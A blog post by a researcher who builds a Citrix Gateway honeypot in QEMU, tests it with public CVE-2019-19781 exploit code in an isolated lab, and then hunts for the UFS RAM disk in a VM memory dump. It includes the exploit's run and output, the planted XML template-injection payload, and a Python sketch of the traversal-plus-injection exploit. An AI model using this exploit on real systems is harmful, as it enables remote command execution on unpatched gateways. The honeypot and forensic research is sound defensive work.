When I heard about the Citrix NetScaler vulnerability (CVE-2019-19781) I wanted to capture some exploits to see what they were doing. It turns out Citrix provide a downloadable version of Citrix Gateway (which was also vulnerable), but using it to capture exploits turned out to be trickier than I’d originally anticipated.
The Plan
Originally my plan was to build something that would recognise the incoming CVE-2019-19781 exploits (/vpns/… URLs) and return suitable replies to elicit a payload. When I went looking for more information on what NetScaler actually was, I found that I could download Citrix Gateway (formerly NetScaler Gateway/NetScaler Unified Gateway) from Citrix’s website. A quick check revealed that Citrix Gateway was also vulnerable, so I nabbed myself a copy.
I was a bit worried because the build number of my downloaded version was later than that listed in the vulnerability details, so I figured that Citrix had back-ported a fix and that consequently the version that I had wasn’t vulnerable.
Looking for details on the vulnerability got me some proof-of-concept code which I could use to check whether my downloaded version of Citrix Gateway was vulnerable. It would also be useful for testing any honeypot setup that I build.
So, with some potentially vulnerable software, and some proof-of-concept exploit code, I ran a test. It turns out that my downloaded version was still vulnerable (which was interesting given that this was just over a month since the vulnerability was announced), but it also demonstrated a problem.
I figured that I could just run the Citrix Gateway software as a virtual machine (which is how Citrix intended it to be used), plonk it on my honeynet, make sure that I had suitable logging and controls in place, and sit back and wait. My plan was to detect a compromise, shut the box down, create a new snapshot image, and start the box up again. That way I'd end up with a collection of disk snapshots, each containing a different exploit attempt.
This turned out not to be so straightforward, however, as the Citrix Gateway software runs from a RAM disk. Consequently any exploits that hit it are lost when the box shuts down.
My next thought was to turn the RAM disk into a persistent disk which I could then snapshot. I eventually (I also have a full-time day job) managed to pull this off after learning about the UFS file system and how it is laid out on disk, and learning about FreeBSD kernel images with an embedded RAM disk image.
However, I then came up with an even 'cooler' (and possibly more compliant with Citrix's end user license agreement) idea. Knowing that it is possible to dump the memory from a running QEMU virtual machine, what if I could dump the Citrix Gateway VM's memory and extract the RAM disk image from the memory dump? That would save me from having to mess around creating a persistent disk image, and also from modifying the original Citrix Gateway disk image.
Preparing the Honeypot
The plan is to create a QEMU virtual machine and use it to run the Citrix Gateway, which turned out to be FreeBSD running Citrix software. Conveniently, Citrix distribute ready-made virtual machine images for us to download (although you will need to create a Citrix account on their web site to do so).
Find and download a KVM (the virtualisation method used by QEMU) virtual machine image tarball from Citrix’s website (https://www.citrix.com/downloads/citrix-gateway/), and extract the contents somewhere environmentally friendly.
Before creating the virtual machine that will be used as the honeypot, we’ll need to create a virtual network in virt-manager for it. Create a virtual network with the following details:
Name: netscaler
Mode: Isolated
Enable IPv4: Yes
Network: 192.168.100.0/24
Enable DHCPv4: No
Enable IPv6: No
DNS domain name: Use network name: Yes
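If you'd rather avoid clicking through virt-manager, a libvirt network definition along the following lines should be equivalent. This is a sketch: the host-side bridge address of 192.168.100.254 is my own choice (so that it can't collide with the gateway's default address of 192.168.100.1), and it's the absence of a <forward> element that makes the network isolated:

[code autoformat='false']
<!-- netscaler-net.xml -->
<network>
  <name>netscaler</name>
  <domain name='netscaler'/>
  <ip address='192.168.100.254' netmask='255.255.255.0'/>
</network>
[/code]

Define and start it with:

[code autoformat='false']
$ virsh -c qemu:///system net-define netscaler-net.xml
$ virsh -c qemu:///system net-start netscaler
[/code]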
We’ll also set up a new disk which will be a qcow2 image that uses the original Citrix supplied disk image as a backing file. That will mean that the original Citrix supplied disk image remains unchanged, and any writes to the disk will go to our new disk image. This will make it easier to go back to the original disk image should we want to.
[code autoformat=false]
$ qemu-img create -b ./NSVPX-KVM-13.0-47.22_nc_64.qcow2 -f qcow2 nsvpx-kvm-disk1.qcow2
Formatting 'nsvpx-kvm-disk1.qcow2', fmt=qcow2 size=21474836480 backing_file=./NSVPX-KVM-13.0-47.22_nc_64.qcow2 cluster_size=65536 lazy_refcounts=off refcount_bits=16
[/code]
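(A side note: more recent qemu-img releases refuse to create an image with a backing file unless you also tell them the backing file's format explicitly, so if the above command complains, add -F qcow2:)

[code autoformat=false]
$ qemu-img create -f qcow2 -b ./NSVPX-KVM-13.0-47.22_nc_64.qcow2 -F qcow2 nsvpx-kvm-disk1.qcow2
[/code]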
The downloadable KVM virtual machine image comes with an XML file (NSVPX-KVM.xml) that can be used with virsh(1) to create the virtual machine (‘domain’), however, we’ll need to edit the XML file a tad.
You'll more than likely want to change the network configuration. I first changed mine to 'Isolated' so that it didn't have Internet access, and was then able to test it with the proof-of-concept exploit code that I found. After confirming that it was vulnerable, I configured it on a honeypot host and gave it access to the honeynet, but as it turns out that was largely pointless (plus it's a routine admin task) so I won't go into that. Edit the XML file (NSVPX-KVM.xml) with your favourite text editor:
Change the network interface type from ‘direct’ to ‘network’:
<interface type='network'>
Change the network interface device (the XML in the <interface> tag) from dev='eth0' mode='bridge' to the virtual network that we created above:
<source network='netscaler'/>
Now change the disk image (the XML in the <disk> tag) to be the newly created disk image, and also specify the full path to it:
<source file='/var/lib/libvirt/images/nsvpx-kvm-disk1.qcow2'/>
Now we should be able to create the virtual machine using the following command. Unless you changed the name of the virtual machine inside the XML file (the <name> tag), it will be called NetScaler-VPX:
[code autoformat='false']
$ virsh -c qemu:///system 'define NSVPX-KVM.xml'
Domain NetScaler-VPX defined from NSVPX-KVM.xml
[/code]
Smashing — you should now be able to start the virtual machine with the following command. Given that you're going to want to log in to it, you may prefer to start it from virt-manager instead. That said, the VM image does support a console on the serial port, so it is possible to log in using the virsh console command, albeit with fewer messages, as not everything seems to be sent to the serial port.
[code autoformat='false']
$ virsh -c qemu:///system 'start NetScaler-VPX'
Domain NetScaler-VPX started
$ virsh -c qemu:///system 'console NetScaler-VPX'
[/code]
Use CTRL-] to exit from the console (like exiting back to the telnet prompt for those of you old enough to have used telnet).
Now we have a Citrix Gateway box that we can log in to using the default credentials of nsroot/nsroot. Let’s try exploiting it.
Exploiting the Honeypot
Originally, I was going to build a vulnerable system and dangle it on the Internet and see what I got. However, when I was looking for information on the vulnerability, I stumbled across some exploit code on GitHub (thanks @jas502n). This was good because it let me test that the version of Citrix Gateway that I had downloaded was indeed vulnerable.
As it turns out finding some exploit code was also advantageous because by the time I’d got all of this stuff built and ready to go, I was no longer seeing any exploits for this vulnerability in the wild! Consequently I’m using the exploit code that I downloaded to demonstrate what would have happened if I’d managed to get the honeypot up and running sooner.
I modified @jas502n’s code because it was trying to use a proxy at 127.0.0.1:8080, which I hadn’t bothered to set up (see notes later). I just removed the proxies by searching for and changing all occurrences of the following line:
proxies = {"http":"127.0.0.1:8080","https":"127.0.0.1:8080"}
to:
#proxies = {"http":"127.0.0.1:8080","https":"127.0.0.1:8080"}
proxies = {}
That is, commenting out the lines (it is set in two locations) that set the proxies dict to 127.0.0.1:8080 and instead setting proxies to an empty dict. Another option would be to remove the proxies=proxies argument from the requests.post() and requests.get() calls.
Once the NetScaler-VPX virtual machine is running, you should see a new network interface and a new network bridge on the host. Obviously the names may differ on your host, but if you are using libvirt and qemu/kvm then the naming convention should be the same and it will more than likely only differ by the digit(s) on the end:
[code autoformat=false]
# show the network interface
$ ip link show vnet0
12: vnet0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master virbr2 state UNKNOWN mode DEFAULT group default qlen 1000
    link/ether fe:54:00:29:74:b3 brd ff:ff:ff:ff:ff:ff

# show the bridge
$ /sbin/brctl show virbr2
bridge name     bridge id               STP enabled     interfaces
virbr2          8000.5254006a638e       yes             virbr2-nic
                                                        vnet0
[/code]
The Citrix Gateway box will set itself up with an IPv4 address of 192.168.100.1/16 by default, which is why we set the virtual network up to use 192.168.100.0/24: the gateway's default address falls inside the host side of that network, so the two can talk to each other.
[code autoformat=false]
$ virsh -c qemu:///system 'console NetScaler-VPX'
Connected to domain NetScaler-VPX
Escape character is ^]

login: nsroot
Password:
Copyright (c) 1992-2013 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
        The Regents of the University of California. All rights reserved.

 Done
> shell
Copyright (c) 1992-2013 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
        The Regents of the University of California. All rights reserved.

root@ns# ifconfig
0/1: flags=8843 metric 0 mtu 1500
        options=800b9
        ether 52:54:00:29:74:b3
        inet 192.168.100.1 netmask 0xffff0000 broadcast 192.168.255.255
        inet6 fe80::5054:ff:fe29:74b3%0/1 prefixlen 64 autoconf scopeid 0x2
        nd6 options=3
[...]
root@ns#
[/code]
Now, since libvirt/kvm created a local bridge interface on the (hypervisor) host for the netscaler virtual network (virbr2), we should be able to reach the Citrix Gateway box directly from the hypervisor host (that is, the host running the virtual machine):
[code autoformat=false]
$ ssh nsroot@192.168.100.1
The authenticity of host '192.168.100.1 (192.168.100.1)' can't be established.
RSA key fingerprint is SHA256:BJDg92vak+mPiHegwdQsGRv6YWuCVSdWZvHCZBgl/aE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.100.1' (RSA) to the list of known hosts.
#
#  WARNING: Access to this system is for authorized users only
#  Disconnect IMMEDIATELY if you are not an authorized user!
#
Password:

 Done
> shell
Copyright (c) 1992-2013 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
        The Regents of the University of California. All rights reserved.

root@ns#
[/code]
Et voilà. Of course, the security-conscious thing to do (to check that your connection isn't subject to a man-in-the-middle attack) would be to log in to the host on the console (rather than with ssh), run ssh-keygen -l -f /nsconfig/ssh/ssh_host_rsa_key.pub, and confirm that the fingerprint matches the one presented by the ssh command, before accepting the key and logging in.
Should you want to check the host key using the above command (and you should), its path is given by the HostKey directive in /etc/sshd_config (HostKey /nsconfig/ssh/ssh_host_rsa_key); the config file itself shows up in the sshd command line (-f option), which you can see by running ps aux | grep [s]shd.
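For completeness, the console-side check looks something like this. The fingerprint shown is the one my VM presented above; the key size and comment fields will be whatever happens to be in your key file:

[code autoformat=false]
root@ns# ssh-keygen -l -f /nsconfig/ssh/ssh_host_rsa_key.pub
2048 SHA256:BJDg92vak+mPiHegwdQsGRv6YWuCVSdWZvHCZBgl/aE root@ns (RSA)
[/code]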
Now that we know that we can reach the box and log in, let’s throw an exploit at it:
[code autoformat='false']
$ python ./CVE-2019-19781.py http://192.168.100.1/

[ASCII art that doesn't at all work in WordPress]

Remote Code Execute in Citrix Application Delivery Controller and Citrix Gateway
Usage: python CVE-2019-19781.py http://x.x.x.x/

                        Python By Jas502n

Set Cmd > ls -l
[+] Upload_Xml= http://192.168.100.1//vpn/../vpns/portal/scripts/newbm.pl
[+] Upload successful!
[+] Xml_Url= http://192.168.100.1//vpn/../vpns/portal/f9a7585e.xml
[+] Command= ls -l
[+] Exec Result:
total 73
drwxr-xr-x    2 root  wheel  1024 Nov 28 19:29 bin
lrwxr-xr-x    1 root  wheel    33 Mar  6 00:02 colorful -> /netscaler/portal/themes/colorful
drwxr-xr-x    3 root  wheel   512 Nov 28 19:45 compat
lrwxr-xr-x    1 root  wheel    15 Mar  6 00:02 configdb -> /flash/configdb
dr-xr-xr-x    8 root  wheel   512 Mar  6 00:02 dev
drwxr-xr-x    8 root  wheel  1536 Mar  6 00:02 etc
drwxr-xr-x    6 root  wheel   512 Mar  4 09:50 flash
drwxr-xr-x    2 root  wheel   512 Nov 28 19:29 home
drwxr-xr-x    3 root  wheel  2048 Nov 28 19:45 lib
drwxr-xr-x    2 root  wheel   512 Nov 28 19:42 libexec
drwxr-xr-x    2 root  wheel   512 Nov 28 19:29 mnt
drwxr-xr-x   16 root  wheel  5632 Nov 28 19:59 netscaler
drwxr-xr-x  260 root  wheel  3584 Mar  6 00:02 nscache
lrwxr-xr-x    1 root  wheel    16 Mar  6 00:02 nsconfig -> /flash/nsconfig/
lrwxr-xr-x    1 root  wheel    33 Mar  6 00:02 optional -> /netscaler/portal/themes/optional
dr-xr-xr-x    1 root  wheel     0 Mar  6 00:47 proc
drwxr-xr-x    2 root  wheel   512 Mar  6 00:19 root
drwxr-xr-x    2 root  wheel  2048 Nov 28 19:29 sbin
drwxrwxrwt    3 root  wheel  1024 Mar  6 00:18 tmp
drwxr-xr-x   10 root  wheel   512 Nov 28 19:45 usr
drwxr-xr-x   38 root  wheel  1024 Mar  4 09:51 var
Set Cmd >
[/code]
Nice. So what did it do? CVE-2019-19781.py issued an HTTP POST request to http://192.168.100.1//vpn/../vpns/portal/scripts/newbm.pl with specific content (a 'specially crafted request' as it were) which caused the Citrix Gateway software to create the file /netscaler/portal/templates/f9a7585e.xml (note that the file name is 'randomised' for each request).
Not only could that be a security risk in itself (depending on where files can be written to), but the contents of the created file, when requested by the web server, cause the web server running on the Gateway to execute the shell command that we entered at CVE-2019-19781.py’s ‘Set Cmd >’ prompt:
[code autoformat='false']
root@ns# cd /netscaler/portal/templates
root@ns# ls -lart
total 168
-r--r--r--   1 nobody  wheel   4637 Nov 28 19:45 styles.css
-r--r--r--   1 nobody  wheel   1991 Nov 28 19:45 wrapper.tmpl
-r--r--r--   1 nobody  wheel    863 Nov 28 19:45 tips.html
-r--r--r--   1 nobody  wheel   7012 Nov 28 19:45 themes.html
-r--r--r--   1 nobody  wheel   4404 Nov 28 19:45 rmft.html
-r--r--r--   1 nobody  wheel   4398 Nov 28 19:45 rmbm.html
-r--r--r--   1 nobody  wheel    326 Nov 28 19:45 resources.tmpl
-r--r--r--   1 nobody  wheel    216 Nov 28 19:45 preferences.html
-r--r--r--   1 nobody  wheel   1340 Nov 28 19:45 ping.html
-r--r--r--   1 nobody  wheel   9063 Nov 28 19:45 newbm.html
-r--r--r--   1 nobody  wheel   1496 Nov 28 19:45 navwrapper.tmpl
-r--r--r--   1 nobody  wheel   7015 Nov 28 19:45 navthemes.html
-r--r--r--   1 nobody  wheel    167 Nov 28 19:45 missing.html
-r--r--r--   1 nobody  wheel   1496 Nov 28 19:45 menu.tmpl
-r--r--r--   1 nobody  wheel     82 Nov 28 19:45 loadresources.tmpl
-r--r--r--   1 nobody  wheel    489 Nov 28 19:45 j_services.html
-r--r--r--   1 nobody  wheel  22646 Nov 28 19:45 homepage2.html
-r--r--r--   1 nobody  wheel  28918 Nov 28 19:45 homepage.html
-r--r--r--   1 nobody  wheel      0 Nov 28 19:45 globalFS.tmpl
-r--r--r--   1 nobody  wheel      0 Nov 28 19:45 globalBK.tmpl
-r--r--r--   1 nobody  wheel   4078 Nov 28 19:45 ftlist.html
-r--r--r--   1 nobody  wheel    368 Nov 28 19:45 filetransfer.html
-r--r--r--   1 nobody  wheel    876 Nov 28 19:45 f_services.html
-r--r--r--   1 nobody  wheel    503 Nov 28 19:45 error.html
-r--r--r--   1 nobody  wheel    743 Nov 28 19:45 err2006.html
-r--r--r--   1 nobody  wheel    754 Nov 28 19:45 err2005.html
-r--r--r--   1 nobody  wheel    711 Nov 28 19:45 err2004.html
-r--r--r--   1 nobody  wheel    764 Nov 28 19:45 err2002.html
-r--r--r--   1 nobody  wheel   3111 Nov 28 19:45 chpwdsuccess.html
-r--r--r--   1 nobody  wheel  10325 Nov 28 19:45 changepwd.html
-r--r--r--   1 nobody  wheel   6712 Nov 28 19:45 bookmark.html
-r-xr-xr-x   1 nobody  wheel    159 Nov 28 19:45 boilerplate.tmpl
drwxr-xr-x  10 nobody  wheel    512 Nov 28 19:45 ..
-rw-r--r--   1 nobody  wheel    333 Mar  6 00:47 f9a7585e.xml
drwxr-xr-x   2 nobody  wheel   1024 Mar  6 00:47 .
[/code]
The f9a7585e.xml file that the exploit created contains the following:
<?xml version="1.0" encoding="UTF-8"?>
<user username="../../../netscaler/portal/templates/f9a7585e">
<bookmarks>
<bookmark UI_inuse="" descr="[% template.new('BLOCK' = 'print `ls -l`') %]" title="f9a7585e" url="http://example.com" />
</bookmarks>
<escbk>
</escbk>
<filesystems></filesystems>
<style></style>
</user>
There are two things of note here — the path in the username attribute of the user tag; and the ls -l command in the Perl code in the bookmark tag’s descr attribute.
The path in the username attribute seems to correspond with the location and file name of the XML file, and the ls -l command in the descr attribute is enclosed in back-tick (`) characters and looks like an attempt to get Perl to execute the contents (similarly to how back-ticks are used in the UNIX Bourne and Bash shells). It is also the command that we gave to the exploit script, and the output from the exploit script suggests that the ls -l command did in fact execute.
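Putting those two pieces together, the guts of the exploit boil down to something like the following sketch. This is based on public write-ups of CVE-2019-19781 rather than being a straight copy of @jas502n's script, and the NSC_NONCE header and the exact form field names are assumptions on my part:

[code autoformat='false']
import requests

target = "http://192.168.100.1"
name = "f9a7585e"  # the real exploit randomises this per request

headers = {
    # Directory traversal in the NSC_USER header controls where
    # newbm.pl writes the bookmark XML file.
    "NSC_USER": "../../../netscaler/portal/templates/%s" % name,
    "NSC_NONCE": "nsroot",
}
data = {
    "url": "http://example.com",
    "title": name,
    # A Perl Template Toolkit directive smuggled into the bookmark
    # description; the back-ticks ask Perl to run a shell command.
    "desc": "[% template.new('BLOCK' = 'print `ls -l`') %]",
    "UI_inuse": "RfWeb",
}

# Step 1: plant the XML file under the templates/ directory.
r = requests.post(target + "/vpn/../vpns/portal/scripts/newbm.pl",
                  headers=headers, data=data)
print(r.status_code)

# Step 2: request the planted file so that it is rendered as a
# template, which executes the embedded command.
r = requests.get(target + "/vpn/../vpns/portal/%s.xml" % name,
                 headers={"NSC_USER": name, "NSC_NONCE": "nsroot"})
print(r.text)
[/code]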
We can change the exploit script and explicitly set the username attribute to something known, like the string usernamefilename, and use that to find where the file would normally be written. To do this, find the headers dict in the upload_xml() function, and change "NSC_USER": "../../../netscaler/portal/templates/%s"%cdl to "NSC_USER": "usernamefilename", as sketched below.
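That is (a fragment; the surrounding entries of the headers dict are unchanged):

[code autoformat='false']
headers = {
    # ... other headers unchanged ...
    # "NSC_USER": "../../../netscaler/portal/templates/%s"%cdl,
    "NSC_USER": "usernamefilename",
}
[/code]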
If we then run the exploit again, we can find where the Citrix Gateway web server would usually create the XML files:
[code autolinks='false']
root@ns# find / -name usernamefilename* -ls
848237    4 -rw-r--r--   1 nobody  wheel  306 Mar  6 03:00 /var/vpn/bookmark/usernamefilename.xml
[/code]
That tells us two things — that the contents of the username attribute are indeed used as the file name, and that the XML files are normally written to the /var/vpn/bookmark/ directory.
The reason the exploit has to use directory traversal (‘..’) and specify an alternative path is because the XML file needs to be accessible by the web server, and interpreted as a template, so it needs to be under DocumentRoot or ScriptDir, or somewhere else that the web server will think of looking for it. Hence the directory traversal attack (which is now a very old security vulnerability and really shouldn’t exist in this day and age) is used to place the file in the templates/ directory.
Now, this is where we notice a problem. Exploiting this vulnerability results in a file being placed in the /netscaler/portal/templates/ directory, but if we list mounted file systems we can see that the /netscaler/portal/templates/ directory is actually on the root (/) file system, and that the root file system is mounted from /dev/md0 which is a RAM disk. The disk devices are named after the type of disk, in this case md, and the digits specify an instance, so md0 represents the first (0) RAM disk (md). Similarly, vtbd0 is the first (0) virtio disk (vtbd) — the virtual disk attached to the virtual machine:
[code autolinks='false']
root@ns# mount
/dev/md0 on / (ufs, local)
devfs on /dev (devfs, local, multilabel)
procfs on /proc (procfs, local)
/dev/vtbd0s1a on /flash (ufs, local, soft-updates)
/dev/vtbd0s1e on /var (ufs, local, soft-updates)
[/code]
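As an aside, FreeBSD will also describe its memory disks directly via mdconfig(8). The output below is paraphrased from memory rather than copied, but the point is that md0 is of type 'preload' (a RAM disk image loaded along with the kernel), so the root file system really does live in RAM:

[code autolinks='false']
root@ns# mdconfig -l -v
md0     preload    426M  -
[/code]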
This poses a problem. Once our Citrix Gateway honeypot is successfully attacked, we’d ideally want to shut it down, create a new disk image (this is why it is handy to create a new disk image using the original Citrix disk image as the backing file), and start the honeypot virtual machine up again. However, if the exploits are being written to the /netscaler/portal/templates/ directory, and that directory is on a RAM disk, we are going to lose those exploit files when we shut the virtual machine down.
After a reasonable amount of jiggery pokery, I managed to extract the RAM disk image from the kernel file, convert it to a physical disk image, and then tweak the resulting installation to use the new setup. This, however, meant modifying the original image.
A neater (not to mention ‘cooler’) approach would be to pull the exploit files from the RAM disk image sitting in the memory of the virtual machine — ‘Hey Rocky — watch me pull a rabbit out of my hat!’.
Finding the RAM Disk Image
The first step in finding the RAM disk image is to actually access the memory of the virtual machine. We have a couple of options here. We could access the kernel debugger over a serial port, and if our honeypot was a physical host we’d have to use this option; or we could take advantage of the honeypot being a virtual machine and ask the hypervisor to dump the virtual machine’s memory to a file. Needless to say, the second option is somewhat easier.
Let's dump the memory of our QEMU/KVM Citrix Gateway honeypot:
[code autolinks='false']
$ virsh -c qemu:///system 'dump NetScaler-VPX /var/tmp/NetScaler-VPX.dump --memory-only'
$ ls -la /var/tmp/NetScaler-VPX.dump
-rw------- 1 root root 2151811000 Mar  6 12:35 /var/tmp/NetScaler-VPX.dump

# it would be a good idea to chown(1) the core file at
# this point so you don't have to run commands as 'root',
# especially commands that are parsing data and prone to
# parsing errors/exploits (printf(3) and format string
# vulnerabilities spring to mind)
$ sudo chown user /var/tmp/NetScaler-VPX.dump

$ file /var/tmp/NetScaler-VPX.dump
/var/tmp/NetScaler-VPX.dump: ELF 64-bit LSB core file, x86-64, version 1 (SYSV), SVR4-style
[/code]
So that has given us an ELF core file, which is the default format. Now, I’m going to take the ‘brute force and ignorance’ approach which will save me from having to look up the format of ELF core files and track the RAM disk image down properly (I tried using Volatility, but it didn’t have a profile for FreeBSD — only for Windows and Linux).
The brute force approach simply involves searching for the UFS file system magic number in the core file. Having said 'simply', it isn't quite that simple. The UFS magic number will appear a number of times. It will appear in the mounted RAM disk image (which is the one that we're interested in), but it will also appear in the RAM disk image that is embedded in the kernel image, and it will also appear in code that needs to parse the UFS superblock — namely UFS file system code. Hence it is likely to be in the kernel, boot code, and file system commands such as newfs and fsck.
Let’s have a look at that ELF core file with readelf and see what it tells us about it:
[code autoformat='false']
$ readelf -a /var/tmp/NetScaler-VPX.dump
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              CORE (Core file)
  Machine:                           ...
  Version:                           0x1
  Entry point address:               0x0
  Start of program headers:          64 (bytes into file)
  Start of section headers:          0 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         5
  Size of section headers:           0 (bytes)
  Number of section headers:         0
  Section header string table index: 0

There are no sections in this file.

There are no sections to group in this file.

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  NOTE           0x0000000000000158 0x0000000000000000 0x0000000000000000
                 0x0000000000000660 0x0000000000000660         0x0
  LOAD           0x00000000000007b8 0x0000000000000000 0x0000000000000000
                 0x00000000000a0000 0x00000000000a0000         0x0
  LOAD           0x00000000000a07b8 0x00000000000c0000 0x00000000000c0000
                 0x000000007ff40000 0x000000007ff40000         0x0
  LOAD           0x000000007ffe07b8 0x00000000fc000000 0x00000000fc000000
                 0x0000000000400000 0x0000000000400000         0x0
  LOAD           0x00000000803e07b8 0x00000000fffc0000 0x00000000fffc0000
                 0x0000000000040000 0x0000000000040000         0x0

There is no dynamic section in this file.

There are no relocations in this file.

The decoding of unwind sections for machine type ... is not currently supported.

Dynamic symbol information is not available for displaying symbols.

No version information found in this file.

Displaying notes found at file offset 0x00000158 with length 0x00000660:
  Owner                 Data size       Description
  CORE                 0x00000150      NT_PRSTATUS (prstatus structure)
  CORE                 0x00000150      NT_PRSTATUS (prstatus structure)
  QEMU                 0x000001b8      Unknown note type: (0x00000000)
   description data: [ hex bytes ]
  QEMU                 0x000001b8      Unknown note type: (0x00000000)
   description data: [ hex bytes ]
[/code]
Right. Let’s have a look and see what that is telling us. The most useful information is in the LOAD program headers, as those headers tell us the allocated blocks of physical memory, and where they are in the core file.
So, what that ‘Program Headers’ output is telling us, is that there are four blocks of memory (identified by the LOAD headers) in the core file:
Physical address (PhysAddr) | Size (MemSiz)      | File offset (Offset)
0x0000000000000000          | 0x00000000000a0000 | 0x00000000000007b8
0x00000000000c0000          | 0x000000007ff40000 | 0x00000000000a07b8
0x00000000fc000000          | 0x0000000000400000 | 0x000000007ffe07b8
0x00000000fffc0000          | 0x0000000000040000 | 0x00000000803e07b8
That first block is 0xa0000 (655360) bytes, and is the '640KB ought to be enough for anyone' block of real/conventional memory. That is, it is the usable part of the lower 1MB of address space that can be addressed with the processor running in real mode (as opposed to in protected mode).
Notice, however, that the second block starts at address 0xc0000, which leaves a gap after the first block. This is because the 384KB between 640KB and 1MB is reserved for hardware ROMs such as those found on video and network adapters. This means that there isn't necessarily any memory at those addresses. If you run the dmesg(8) command on the NetScaler VM you can see this area being used:
orm0:  at iomem 0xc0000-0xc97ff,0xea000-0xeffff on isa0
...
vga0:  at port 0x3c0-0x3df iomem 0xa0000-0xbffff on isa0
That output shows display memory at 0xa0000 – 0xbffff — I'm not sure why that wasn't included in the core file, but it's irrelevant for what we're trying to do so I'm not going to dwell on it. You can see that the NetScaler kernel (FreeBSD) has detected option ROMs mapped between 0xc0000 – 0xc97ff and between 0xea000 – 0xeffff. The 64KB from 0xf0000 up to the 1MB mark at 0x100000 will be the system BIOS ROM.
That second memory block is 0x7ff40000 bytes, which is 0x80000000 – 0xc0000. That is, it is 2GB minus the first 768KB of the address space (the 640KB of conventional RAM in the first block, plus the 128KB of display (VGA) memory at 0xa0000 – 0xbffff). The second block therefore picks up at 0xc0000 (768KB), where the option ROM area begins.
The third and fourth blocks baffled me for a bit: they start at 0xfc000000 and 0xfffc0000, addresses above the 2GB of memory assigned to the virtual machine. After doing some hunting I found an osdev web page documenting the memory layout on x86 machines, which explains that the address range between 0xc0000000 and 0xffffffff is typically reserved for memory-mapped devices.
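Incidentally, those LOAD headers are all we need to translate a guest physical address into an offset in the core file. Here's a little Python sketch (the segment numbers are copied straight from the readelf output above):

[code autoformat='false']
# the (PhysAddr, Offset, MemSiz) triples from the readelf output above
SEGMENTS = [
    (0x0000000000000000, 0x00000000000007b8, 0x00000000000a0000),
    (0x00000000000c0000, 0x00000000000a07b8, 0x000000007ff40000),
    (0x00000000fc000000, 0x000000007ffe07b8, 0x0000000000400000),
    (0x00000000fffc0000, 0x00000000803e07b8, 0x0000000000040000),
]

def phys_to_file_offset(phys):
    """Return the core file offset holding guest physical address phys."""
    for seg_phys, seg_off, seg_size in SEGMENTS:
        if seg_phys <= phys < seg_phys + seg_size:
            return seg_off + (phys - seg_phys)
    raise ValueError("address 0x%x is not present in the dump" % phys)
[/code]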
Back to our little RAM disk. This is where a little knowledge of UFS file systems comes in handy. After searching for information on the UFS file system magic number and superblock layout and not getting very far, I eventually found a web page giving me the information that I was after. The web page showed an excerpt from a book: File System Forensic Analysis, by Brian Carrier (@carrier4n6) — thanks, Brian. When I saw it, I recognised the title — I had two copies on my bookshelf (one I'd actually purchased as part of a box set of three forensics books, and the other I received on the SANS forensics course)!
We can cheat a bit here because we have root access to the running system, so we can actually dump the first few blocks of the RAM disk device and see what it looks like. That will then help us find it in the memory dump:
[code autolinks='false']
root@ns# dd if=/dev/md0 of=/var/tmp/md0 bs=512 count=132
132+0 records in
132+0 records out
67584 bytes transferred in 0.002063 secs (32760058 bytes/sec)
root@ns# file /var/tmp/md0
md0: Unix Fast File system [v2] last mounted on /, last written at Mon Mar  9 00:59:22 2020, clean flag 0, readonly flag 0, number of blocks 218112, number of data blocks 211159, number of cylinder groups 4, block size 16384, fragment size 2048, average file size 16384, average number of files in dir 64, pending blocks to free 0, pending inodes to free 0, system-wide uuid 0, minimum percentage of free blocks 2, SPACE optimization
[/code]
Smashing. Now that file(1) output tells us that the RAM disk contains a UFS v2 file system. If we consult File System Forensic Analysis, chapter 17: UFS1 and UFS2 Data Structures tells us that the UFS2 superblock is typically located in sector 128, and then lists the fields typically used by FreeBSD and OpenBSD. It also tells us that we need the first 1,376 bytes of the superblock to capture the UFS2 magic number. This is why I used bs=512 and count=132 on the dd(1) command above — it was to make sure that I captured the UFS2 superblock, up to and including the UFS2 magic number at least (count=128 would read up to the start of the superblock in sector 128; we then need at least 3 more sectors to capture the 1,376 bytes of superblock, and 3 is a funny number in IT so I rounded it up to 4, being a power of 2).
Right. So the superblock is in sector 128, and the UFS2 magic number is at offset 1,372 – 1,375 (four bytes) in the superblock. This means we should be able to see the UFS2 magic number (0x19540119, written here most significant byte first) at offset 128 * 512 + 1372, which is 66,908, or 0x1055c:
[code autolinks='false']
# Start dumping in 'canonical' form (-C), which is an easy
# way of getting single byte output,
# and start at offset 0x10550 (-s 0x10550)
root@ns# hexdump -Cs 0x10550 /var/tmp/md0
00010550  00 00 00 00 00 00 00 00  00 00 00 00 19 01 54 19  |..............T.|
00010560  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00010800
[/code]
… and we do — note that the magic number is in little-endian format (that is, backwards) in the RAM disk image.
File System Forensic Analysis, chapter 16: UFS1 and UFS2 Concepts and Analysis tells us that a UFS file system is laid out on disk as follows:
Sector(s)   | Byte offset (hex / decimal) | Description
0           | 0x000000 / 0                | Boot code 1
1           | 0x000200 / 512              | BSD disk label
2 – 15..127 | 0x000400 / 1,024            | Boot code 2
128         | 0x010000 / 65,536           | Superblock
Let’s have a look at the actual data so we can come up with something to search for in the memory dump.
[code autolinks='false']
root@ns# hexdump -C /var/tmp/md0
00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000200  57 45 56 82 00 00 00 00  61 6d 6e 65 73 69 61 63  |WEV.....amnesiac|
00000210  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000220  00 00 00 00 00 00 00 00  00 02 00 00 3f 00 00 00  |............?...|
00000230  10 00 00 00 61 03 00 00  f0 03 00 00 00 50 0d 00  |....a........P..|
00000240  00 00 00 00 00 00 00 00  10 0e 01 00 00 00 00 00  |................|
